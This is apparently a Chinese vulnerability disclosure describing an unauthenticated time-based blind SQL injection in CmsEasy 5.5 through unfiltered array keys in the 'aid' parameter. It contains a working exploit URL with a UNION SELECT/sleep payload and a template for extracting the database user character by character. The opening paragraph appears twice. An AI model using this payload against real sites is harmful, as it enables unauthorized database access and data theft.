### 简要描述: cmseasy 前台sql盲注(绕过union,sleep等函数,无需登录,无防御) ### 详细说明: archive_act.php:(line:27-33) ``` } front::check_type($this->pagesize); $announcement = new announcement(); $this->view->announcements = $announcement->getrows(null, 10); $this->view->usergroupid = 1000; front::check_type(cookie::get('login_username'), 'safe'); front::check_type(cookie::get('login_password'), 'safe'); $this->view->showarchive = archive::getInstance()->getrow(front::get('aid')); $addcontentuser = new user(); $addcontentuser = $addcontentuser->getrow(array('userid' => $this->view->showarchive['userid'])); ``` 这里有一句: $this->view->showarchive = archive::getInstance()->getrow(front::get('aid')); 我们跟进去这个函数getrow: ``` function getrow($condition,$order='1 desc',$cols='*') { $this->condition($condition); return $this->rec_select_one($condition,'*',$order); } ``` 然后在看看这个函数condition: ``` function condition(&$condition) { if (isset($condition) &&is_array($condition)) { $_condition=array(); foreach ($condition as...
### 简要描述: cmseasy 前台sql盲注(绕过union,sleep等函数,无需登录,无防御) ### 详细说明: archive_act.php:(line:27-33) ``` } front::check_type($this->pagesize); $announcement = new announcement(); $this->view->announcements = $announcement->getrows(null, 10); $this->view->usergroupid = 1000; front::check_type(cookie::get('login_username'), 'safe'); front::check_type(cookie::get('login_password'), 'safe'); $this->view->showarchive = archive::getInstance()->getrow(front::get('aid')); $addcontentuser = new user(); $addcontentuser = $addcontentuser->getrow(array('userid' => $this->view->showarchive['userid'])); ``` 这里有一句: $this->view->showarchive = archive::getInstance()->getrow(front::get('aid')); 我们跟进去这个函数getrow: ``` function getrow($condition,$order='1 desc',$cols='*') { $this->condition($condition); return $this->rec_select_one($condition,'*',$order); } ``` 然后在看看这个函数condition: ``` function condition(&$condition) { if (isset($condition) &&is_array($condition)) { $_condition=array(); foreach ($condition as $key=>$value) { //$value=str_replace("'","\'",$value); $_condition[]="`$key`='$value'"; } $condition=implode(' and ',$_condition); } else if (is_numeric($condition)) { $this->getFields(); $condition="`$this->primary_key`='$condition'"; }else if(true === $condition){ ``` 这里我们发现了如果传递进来的东西key没有做任何过滤, 我们发送请求: url:http://192.168.10.70/CmsEasy_5.5_UTF-8_20140818_new/uploads/index.php?case=archive&aid[typeid%60%3d1%20UNION%20SELECT/**/1,2,3,if(1,sleep(if(1,5,1)),1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%23]=1 在后台抓取后看看是否效果sql语句完美执行: SELECT * FROM `cmseasy_archive` WHERE `typeid`=1 UNION SELECT/**/1,2,3,if(1,sleep(if(1,5,1)),1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58#`='1' and (state IS NULL or state<>'-1') ORDER BY 1 desc limit 1 一个完美的sql语句执行完毕,这时候网页刷新时间为5秒钟,那么下来我们怎样去猜测字段 SELECT * FROM `cmseasy_archive` WHERE `typeid`=1 UNION SELECT/**/1,2,3,if(ascii(substr(user(),1,1))=$NUM,sleep(if(1,5,1)),1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58#`='1' and (state IS NULL or state<>'-1') ORDER BY 1 desc limit 1 我们可以改变$NUM的值 这里要进行urlencode ok剩余的就不解释了 ### 漏洞证明:
